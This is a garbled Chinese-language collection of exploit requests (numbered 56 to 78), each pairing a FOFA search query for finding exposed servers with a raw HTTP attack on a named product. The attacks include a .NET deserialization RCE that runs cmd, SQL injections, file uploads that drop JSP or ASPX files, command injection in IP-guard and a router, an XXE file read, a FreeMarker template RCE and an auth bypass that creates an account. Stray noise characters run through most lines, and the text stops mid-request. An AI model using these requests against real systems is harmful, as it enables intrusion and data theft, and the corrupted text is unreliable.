56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
, ?3 z3 s: l- Y0 p( N0 _FOFA: app="畅捷通-TPlus") D; M: V9 e8 l
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.15 t/ V% I7 u8 S- p: W a
Host: x.x.x.x9 {6 L2 _( c8 t) e2 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36- Y! b r. I6 w
Content-Type: application/json
5 T2 H- @. {" W
9 v$ P+ D3 h$ g1 n4 r- m1 I{
6 e ?" i6 g! c* ~ "storeID":{' M: N: {6 t" I1 j8 l
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",% O- L! ~7 z. e# V5 [
"MethodName":"Start",. u4 |/ i3 e) q; m8 G; V
"ObjectInstance":{* g9 {( J8 Y/ W3 V0 _* g
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 S) T. p8 `' ?$ y1 h; M "StartInfo": {9 k& E! E o1 E0 ?" Y& j- `/ v. P
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! z v% X o" ^0 e9 W1 V "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"! B1 p& O4 c: D
}8 C$ K/ S! I/ K0 B Y; E
}' r8 @9 Z2 O: p. S' s$ i3 ]
}
0 g3 T3 Z0 l; c! Y5 g! N}
: U4 O, j, z( ]- ~9 a' W6 J; H) M( r
# c- k% W9 v( z57. 畅捷通T+ keyEdit.aspx SQL注入
7 q) i" B6 w, A2 qFOFA:app="畅捷通-TPlus"3 r0 }2 t' `8 i& x1 \4 i8 _: o0 D2 P
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.15 q6 b' Z( T9 ?5 d4 m+ e0 w
Host: host
: ~' g2 E4 L6 c3 ?/ M3 [( {User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 B8 F8 r7 L$ e2 s) z4 |5 J7 _
Accept-Charset: utf-8. S( L* r5 o3 d; K
Accept-Encoding: gzip, deflate X/ W7 v$ r! T/ j- P8 l
Connection: close* ~/ F6 ~# V$ J- m+ N' t1 V
% k" o) I; ^& L. F
E! B, H. K0 X, m58. 畅捷通T+ KeyInfoList.aspx sql注入+ O# H: `# L3 J D$ n
FOFA:app="畅捷通-TPlus"
; s8 C' p% g& B% c) W3 }GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
$ R+ u2 D1 H1 _! {6 y. V; vHost: your-ip
$ I. X; z0 i/ C/ {9 O! A; uUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" B# K. P; i7 i* t7 zAccept-Charset: utf-8
+ T' F4 |7 C0 `Accept-Encoding: gzip, deflate4 ]( B5 A V% x- h
Connection: close, a _4 E! n8 b# a
) `4 a }0 D4 T' S
- ?; d9 _8 d: q. b2 J1 \ B0 ^) A59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行$ ?% o" Z) X/ H( U$ }) ~
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"5 k4 F8 S- F5 V& }- |$ G1 v
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
5 T5 R f7 o1 K& ^8 j; rHost: 192.168.86.128:9090; @+ p. \9 l2 m) n
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
8 ~7 f9 D* a( R3 dConnection: close
+ [! _: ? k# O) c7 P4 B) WContent-Length: 16691 c! q3 T- N/ d) G* C
Accept: */*$ o8 V* p+ I3 n: r8 s V/ _/ O; M+ g& b
Accept-Language: en
2 J+ W" v- t% Q) v2 |. {Content-Type: application/x-www-form-urlencoded
5 s! H9 N* O7 m3 F2 \8 NAccept-Encoding: gzip. v4 O7 m! P% ?: W4 I
- r- x* P) C7 W3 WPAYLOAD5 {7 E# j/ M. c' D6 Z
6 y3 q$ a' m5 p9 G: ~2 i
# t! b* o t6 ^60. 百卓Smart管理平台 importexport.php SQL注入
; f5 d& l3 L3 u/ w/ h+ uFOFA:title="Smart管理平台"
- q7 p3 @! j F/ f: H5 {5 bGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
" q; s0 }6 r# `Host:
. O) a0 U, [$ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- j' Z6 y8 u, H7 j2 k. ?& V& Q8 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) ~1 y: N0 ^- Z9 j7 X1 qAccept-Encoding: gzip, deflate& j& B/ ?" X! ?/ v/ F8 c
Accept-Language: zh-CN,zh;q=0.9
' K: L% k1 p/ x5 q V, R- ZConnection: close
( x. S% B$ h( |8 v0 }' \
; r- E* ]" l! F* n) j: k3 i/ U7 k- h6 {( F: i. P7 ^- M% o3 ]
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传$ n& l, S4 x8 M+ k8 B+ k+ ?
FOFA: title="欢迎使用浙大恩特客户资源管理系统"- t# D' V) F( D" ~7 A; a
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
: J! q$ g+ W) x5 m$ ]% i7 jHost: x.x.x.x9 a6 ^8 R& T1 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. T j/ C7 F) r3 c9 R* DConnection: close
" c" K# V' {: z& e) R* TContent-Length: 27! S% C; c" L9 g, J5 A) [: i
Accept: */*
6 L- f$ D8 O% m- bAccept-Encoding: gzip, deflate
. ?# K5 ^4 e( P0 sAccept-Language: en7 Z0 s; n1 f9 [, i2 T7 r$ T% v8 e
Content-Type: application/x-www-form-urlencoded. p. r+ O6 H) U: f* g2 `1 E+ O( ^
7 j. v3 x6 M1 j5 \) g4 X: w
8uxssX66eqrqtKObcVa0kid98xa* J5 x( f* A" ?4 a4 D5 s5 S% ]- c
( b, D3 `& S( m- q0 x s% d$ n; G9 ]5 T1 i" [
62. IP-guard WebServer 远程命令执行7 j+ }9 s! r/ i% Z1 P) ^
FOFA:"IP-guard" && icon_hash="2030860561"
% x* V/ N, Q5 ~- yGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
! u' ~1 V; m9 b `3 vHost: x.x.x.x& _" C3 i+ s2 x! g8 c: m; S9 n& ~9 v. |
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
. p1 l- ?) Z* |Connection: close
2 j1 t- `7 \8 I4 V! H+ S( FAccept: */*
9 c j# z2 D+ |- f! k. \; G" LAccept-Language: en
6 k7 G0 \# h) h' |Accept-Encoding: gzip
$ Q6 V- u; i% j. T/ |6 m. U: p; w2 W/ E' @5 z2 j5 N
7 J( ], Q# [$ o访问
$ M* Z1 E4 k: m' X% J$ h
+ O# U* C8 z4 ]: |" kGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
% t7 h- M$ Y+ m8 _6 N. Y* L% u" KHost: x.x.x.x# S7 t. @5 C! z
3 S1 S6 L% b) ^: B, i/ Z3 y
8 w7 c3 R: Y0 j! `9 }# N
63. IP-guard WebServer任意文件读取; `* c& Y7 \4 _ c- V5 [
IP-guard < 4.82.0609.0
# Z( K0 ~" ]7 w! L" J5 @8 C+ RFOFA:icon_hash="2030860561"
" ]% m! f& e# mPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
! p4 q( f! d/ |: r5 h2 }& jHost: your-ip
A! U2 ~' G. j) I( ]6 y9 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+ l- b& x( z/ X, aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. B9 ]& |8 _+ s% IAccept-Encoding: gzip, deflate
" J9 R! c! F( W9 EAccept-Language: zh-CN,zh;q=0.9
- l- P8 c, q; |2 p3 l$ J- qConnection: close
$ Z) l. \% B' A; s4 O4 V# \) c( hContent-Type: application/x-www-form-urlencoded
" } E4 Z% f {
) @5 E, u7 E( B( {path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A3 G' P2 P3 X( J# c) b# A- w/ J, e E
9 B F$ `; Q3 Q; Z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
4 U4 J7 ^0 o, M% o4 ?FOFA:body="/Scripts/EnjoyMsg.js"6 l& [# _7 k+ F& j
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
8 v/ b1 A1 A/ Z/ l& H5 s0 p& GHost: 192.168.86.128:9001
% |, F s; K6 D5 V8 Y* [User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
2 j ~: q+ ^* w) T# VConnection: close0 ?& `1 n. c" s- V! s: Q3 e
Content-Length: 3694 W+ [6 e/ q6 F d' a
Accept: */*% D8 L0 L" n/ I' L5 ^
Accept-Language: en
9 r! ?" l, j9 A4 ~Content-Type: text/xml; charset=utf-8 C, G0 ]+ V; B+ {+ x2 a2 w
Accept-Encoding: gzip0 E$ H6 ^4 z' ?2 a. W5 N0 S
6 k% J$ H5 e5 P4 H' Z* k& s<?xml version="1.0" encoding="utf-8"?>& Z/ [, k8 w* D6 g* k0 e8 L
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
1 R& ~! K |7 Q<soap:Body>. d J4 G) @+ ^. Q( ]: V
<GetOSpById xmlns="http://tempuri.org/">
# {. e6 D" b m" @: |1 M/ {+ T7 | <sId>1';waitfor delay '0:0:5'--+</sId>4 H7 d( ?0 @) h7 s
</GetOSpById># }# s9 T: V" `% O- i) m
</soap:Body>3 v4 E# o) K: F2 r5 m
</soap:Envelope># x8 h* O; x8 e X0 Z( B
. m" T: }& q: ~5 v! v. P- m) k/ `$ G+ u1 f# R8 e
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
" F* U. k: Z+ FFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"5 O% R) l @2 ^, n7 L' y
响应200即成功创建账号test123456/123456
9 e$ H* ? M" N* u, m; m, ^POST /SystemMng.ashx HTTP/1.1
8 G1 v4 k' S; h- b* W* mHost: Z' N* s9 _5 |/ [4 U. Y. S% }& M
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)1 I8 t" v7 T3 i8 f4 E3 D8 l* F- G( X' E
Accept-Encoding: gzip, deflate
# g f% ]& v8 m" ]# K% @- b% PAccept: */*# B5 t9 N# a- _* @7 f& b4 n, L; l- l1 V
Connection: close
/ d" _" F3 f; ?! |3 {7 Y- IAccept-Language: en i: a w' P6 E& E
Content-Length: 174
5 X/ v# d; j# q0 X2 R W6 c6 e, e' U) U' S
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators0 w* Q7 }: C$ T/ U8 A
0 w5 q6 I7 `7 G
/ L* w* E" J1 v! S0 a( N8 z66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入& @4 ]$ Q, X5 P! N8 G8 r
FOFA:app="万户ezOFFICE协同管理平台"# Q: d( M6 W. k; j3 e1 t5 d
" ?8 i- P* r; V: r/ p1 L& gGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1# G; T! H( i* F3 P8 e2 E
Host: x.x.x.x
9 `! q, ^7 f$ i8 X) K5 j! gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 ?$ m1 G* a3 i" [Connection: close
2 X* |" [: i. hAccept: */*
1 h5 ^' s; F2 PAccept-Language: en6 a3 c& o( H5 F% L
Accept-Encoding: gzip3 {6 _" o; C0 i9 I
- W/ c- ~) r9 V2 o- T2 ]% X+ W
$ Z! H$ x2 R1 ?2 H6 ^# `
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在$ ]$ z3 M# l: S
, s, V( h' e. J* |5 q# q
67. 万户ezOFFICE wpsservlet任意文件上传( g7 F; g4 B* }" L2 Q
FOFA:app="万户网络-ezOFFICE"
3 f Y# J1 V- T0 w+ N f7 h6 jnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
, J8 O, g5 {( v& P# rPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
; h6 W$ X5 s' S% s; e; DHost: x.x.x.x, ?/ z6 y* E2 \9 _1 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.05 A( S1 F/ A5 G$ k
Content-Length: 173
" m4 Q. H1 \6 R" H4 L& fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.86 j% R9 V1 @7 P7 X
Accept-Encoding: gzip, deflate# Z L, J. O- `) G
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3$ @4 T3 f ]/ l6 {+ P4 g3 |
Connection: close
. {6 Z0 `4 a& X; T$ i7 KContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp( u1 \( E6 n# i- N# y
DNT: 1$ C# t3 O% f$ B
Upgrade-Insecure-Requests: 1
2 G/ `/ }/ j- Q; j
8 ]8 e( N/ {. }* x' C; g--ufuadpxathqvxfqnuyuqaozvseiueerp
. p9 R: T8 W/ s T" {5 @- \% XContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"7 [9 \: D# j4 T
& j4 x- ? P& I" }1 e" C<% out.print("sasdfghjkj");%>
4 I m8 f0 Z3 i% ?0 R ]+ S--ufuadpxathqvxfqnuyuqaozvseiueerp--. T+ U" N; H; u' u
. r9 T/ E. d& j/ ^$ ?! O4 k5 f4 j# ?. N& b' P/ T
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
' X+ c4 J7 j e$ Y4 `' R0 I- d2 y' J- D5 K
68. 万户ezOFFICE wf_printnum.jsp SQL注入
# Z3 ]- q# r3 ?2 z( s8 `FOFA:app="万户ezOFFICE协同管理平台"; W8 r2 Q1 _- F! G6 s
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
! \5 H" `! G6 p/ gHost: {{host}}7 p7 ]- R' J7 F! `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36! m6 J4 E2 b% q5 X! X% Z' w
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
/ U; r1 V2 Y4 l( [Accept-Encoding: gzip, deflate
7 E) a5 o9 c) @Accept-Language: zh-CN,zh;q=0.9
1 h: T$ @1 L+ F5 P- n( @ { `Connection: close. g# Q+ K8 |4 \8 L3 m" F$ F
2 x! D; N$ i; x1 i* R& [
$ p/ u) x3 [/ c* ~, |4 r7 e8 A8 _
69. 万户 ezOFFICE contract_gd.jsp SQL注入( ~, s8 G# g, K" K* w
FOFA:app="万户ezOFFICE协同管理平台"6 p) }" l4 m# D. G% ~- P
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1 n$ b& R/ ~& }0 P9 L
Host: your-ip
4 K( k; e$ g X1 T2 J5 [2 CUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+ {- L* a4 j$ `* NAccept-Encoding: gzip, deflate
5 y5 t6 |5 Y- B) B* A$ }Accept: */*; H5 O n0 ]) C9 t. _- w0 N
Connection: keep-alive
" {( M+ f" j8 }& ], F4 j. a( V$ M9 |# Z' Q# g; M' E) h
' O1 Z4 E' t C# ?& M m
70. 万户ezEIP success 命令执行, R+ V5 m( o8 d* C5 d
FOFA:app="万户网络-ezEIP"
& N" f' t9 q, ?. Y! ZPOST /member/success.aspx HTTP/1.1
8 `; M* }, a5 S0 p1 }* R( gHost: {{Hostname}}
- [8 z' K7 f1 u& i! q. [( CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ M: |" ~9 ?/ A; R1 j3 A5 w
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=5 h9 T- w2 ~( r' O/ u3 P3 ]
Content-Type: application/x-www-form-urlencoded
6 T- e; _+ F2 H- a: ]TYPE: C
6 {; [& c$ i& o0 `Content-Length: 16702
" \' m, g" C6 d/ s: a. L
0 X# W, Z0 ~4 v3 Y) T__VIEWSTATE=PAYLOAD
, ]8 b8 y. g9 l: u% y0 u# d
2 D C! m& @/ Z p) U5 q1 A1 q& O/ S( H+ G
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
& N6 _) W4 p$ JFOFA:body="PM2项目管理系统BS版增强工具.zip"
% {' I6 K, t2 {& x( sGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
* d' v! O. t! k5 ?) Y+ r4 Y6 Q GHost: x.x.x.xx.x.x.x
. \, j8 k4 l, g5 ]3 }9 u7 Z% X2 @$ XUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
9 t* C- `) }8 F m3 y& |Connection: close& h C4 t6 D& J |$ k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 u: z, ^0 Z+ r$ ]Accept-Encoding: gzip, deflate
' X/ _, f, X8 y yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 ^, k, w; F- a' ~0 H% p/ m6 l5 UUpgrade-Insecure-Requests: 1
/ a% \3 Y3 U$ o4 B6 i6 y J% q+ w7 ^3 B* o+ a
( ]5 Z1 [, B- U! B" [/ }) R
72. 致远OA getAjaxDataServlet XXE- ~6 Q: s( A! L* I
FOFA:app="致远互联-OA"8 Z% Y$ d, t* e& R: n% f2 f9 P2 g
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.17 I& C- N# |( u& i" E, v
Host: 192.168.40.131:8099; j6 m4 N. a {9 h# e1 S
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
" T i6 N0 e5 Q& U0 g" EConnection: close
% D6 S8 R, i# p4 C5 n! eContent-Length: 583' G# N0 d, ]" A. ]
Content-Type: application/x-www-form-urlencoded
, c& ^" P2 Z# F2 X* o! dAccept-Encoding: gzip( _: ?. d. ^# \2 _3 n4 k
; f1 i1 }3 `5 g+ ^) q+ w
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E( {) u0 X3 N% _. A& m0 `9 H% ?
# u; s6 T: o+ q3 K! L6 ?
* Q! g6 M5 K, C+ R/ B73. GeoServer wms远程代码执行
2 K4 B, y) _. WFOFA:icon_hash=”97540678”' j a, a# T4 c# R
POST /geoserver/wms HTTP/1.1
, k$ j8 m N, t+ v _, [8 B$ ?Host:
: Z2 |1 _: a# O6 a+ nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' S- v( B3 L1 M2 C9 ]
Content-Length: 1981# b; C9 n, f i" _. J# b4 q
Accept-Encoding: gzip, deflate
. h) q6 ~2 A" A5 `' @Connection: close
! r- \8 ]/ G# M A. m# c) xContent-Type: application/xml1 I( J. v" G4 E3 K9 h2 T4 w& M
SL-CE-SUID: 31 G1 O" K* g- l6 R: T
- O0 I3 ?* v+ a7 G. O" ~: kPAYLOAD# h0 \- `9 f, M3 o, @0 e! D
2 i/ Y# o6 F; s0 v
* x% f M4 u6 Q! N5 K4 |8 }; a! ^
74. 致远M3-server 6_1sp1 反序列化RCE: a' _5 R6 N/ F. S
FOFA:title="M3-Server", t0 Q1 u& G: T) i6 J" X6 N
PAYLOAD
2 w: d) r1 E$ ^3 Q0 b4 z( r; W, o4 @( ]* L7 Y2 \" Y$ a; n
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
$ }- [: i2 i7 d; h. dFOFA:app="TELESQUARE-TLR-2005KSH"
4 c3 M1 x4 u( e) n( v3 H& ?9 PGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
$ ~# {8 L+ V# M7 I6 b9 F" uHost: x.x.x.x3 F- v$ ], W3 q% E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 l. v" j( N" U6 x3 A. }6 ]( g
Connection: close' a, Q+ _, |9 N* L* E; U( M6 i
Accept: */*
1 M1 C6 N0 P. u2 C( q. k% c7 bAccept-Language: en6 n3 n' w x! q. ]. Y D
Accept-Encoding: gzip
- @# m0 x5 f3 l% p3 K% ~
6 Z* n, \5 i8 W/ ~' S5 I5 T/ B( d) q3 H6 c- V0 v
GET /cgi-bin/test28256.txt HTTP/1.1/ t: [2 j; N& J8 v9 F/ g2 G' W" m
Host: x.x.x.x
3 s* }: ?$ b" T+ ]
/ B+ m7 q" e% m2 H7 s- l- i( a: i
) a# w$ A5 I$ e y% o. t76. 新开普掌上校园服务管理平台service.action远程命令执行
3 V0 W& p% C' y6 {. j/ [5 gFOFA:title="掌上校园服务管理平台"
+ A5 K4 n, \8 {: e9 l% WPOST /service_transport/service.action HTTP/1.1: V* s' V# v: R- M5 r6 G+ D6 x
Host: x.x.x.x. N/ K* k* d2 |6 n0 B L$ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0' @* e: a; _$ ]. N; L% u8 p P( C
Connection: close# v' e- L( Q5 h9 m' l W4 Q- w
Content-Length: 211
: }4 L0 ]$ t5 ~/ U3 O( @# wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ Q; ]) @9 ?0 [! ^1 V* U" J0 NAccept-Encoding: gzip, deflate9 T; s _% p6 c f d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ k. c Z" M {* m9 E
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 `9 F0 ?( u, V7 p
Upgrade-Insecure-Requests: 1
# B! Z/ D, `/ ]. H1 T4 I, R+ w) s. _/ H- W* }5 @
{. L+ }& c) g/ O3 P- p$ x& Z: o
"command": "GetFZinfo",
+ j6 f9 _- x/ i "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
/ _5 m3 \- o2 M8 z+ }) U5 A, y ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}") K8 a" I5 A" `
}" x8 J# ^3 {5 E# J. n8 S& }# t; D
" \' ~0 A* Q' J* f2 C
* O- }1 f* M& E& y( Z E7 ] {GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.14 W* s9 \" @# k: N" \' C; o& [2 P
Host: x.x.x.x2 @ m r' t& m( n9 x
, w4 d- l+ u# n4 `. X3 U. \& p6 h% \6 O
: p, ~9 b! {# p& q% V; s% _77. F22服装管理软件系统UploadHandler.ashx任意文件上传8 H9 x/ d7 l* X
FOFA:body="F22WEB登陆"
; G @8 F! t& E0 ^0 Q# L8 K, _POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
6 A, t( f( Q% k: pHost: x.x.x.x
' _ L* o+ z4 L. m o4 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.367 x. h& a \( l0 V6 F/ Q( Y( l
Connection: close6 j4 z* T* b+ @/ R3 T% z: K
Content-Length: 433+ n$ v& a9 U% l6 l( `& z. |. F
Accept: */*4 k& g) e+ h% o; A' ]* G3 n, u
Accept-Encoding: gzip, deflate
" P4 x# ^' b. S; p& zAccept-Language: zh-CN,zh;q=0.9
. Z; j# n8 v" z2 r* TContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix' J$ q5 ^5 }4 y0 { S" I$ J B
+ ^" D4 W! H. U# Y
------------398jnjVTTlDVXHlE7yYnfwBoix4 K' T _1 V1 V( g5 T
Content-Disposition: form-data; name="folder"0 S! s @' `* A4 O# A
& G X% B8 i; B# } I& d, j& c$ D- r/upload/udplog a) I7 k+ a* L2 O8 o, w
------------398jnjVTTlDVXHlE7yYnfwBoix7 _6 Q$ I; V# M2 r: X
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
6 W+ D; a- Q' j/ f) qContent-Type: application/octet-stream. }% M$ @9 R3 E) K ]
8 h k' q% m! H# e: M: n$ a
hello1234567
8 f8 L9 q# \( t" c- `------------398jnjVTTlDVXHlE7yYnfwBoix
2 N* Y$ |3 M' A5 H3 G0 KContent-Disposition: form-data; name="Upload") G! v0 ]' ?9 K2 L
# X3 v8 v3 D, z. y6 {* S9 DSubmit Query
) S4 t0 S( i6 F# x% B------------398jnjVTTlDVXHlE7yYnfwBoix--2 E/ Y5 w: z+ b, b3 D" r) E- s$ E
; l% Z) O( Z4 p5 N
X4 J- }/ C, b7 B
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传% m' @- ]. A, ?- F$ s, E1 w1 W
FOFA:icon_hash="2001627082"0 @' D4 h. Q4 X. p9 \
POST /Platform/System/FileUpload.ashx HTTP/1.17 q$ G, [; m* G
Host: x.x.x.x8 I' h2 `- m1 D2 P/ l3 \( h" G' K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 ^; j" P9 L5 `2 C: e2 Z
Connection: close
8 @' f! b. ]; j2 FContent-Length: 336
1 ^; n2 w9 [- X' j, B/ ^Accept-Encoding: gzip
9 l7 C, Y/ H' X5 v v U, g" }Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
! V! m* {, @+ N
. r4 ?/ T- F; d* H' x7 x------YsOxWxSvj1KyZow1PTsh98fdu6l
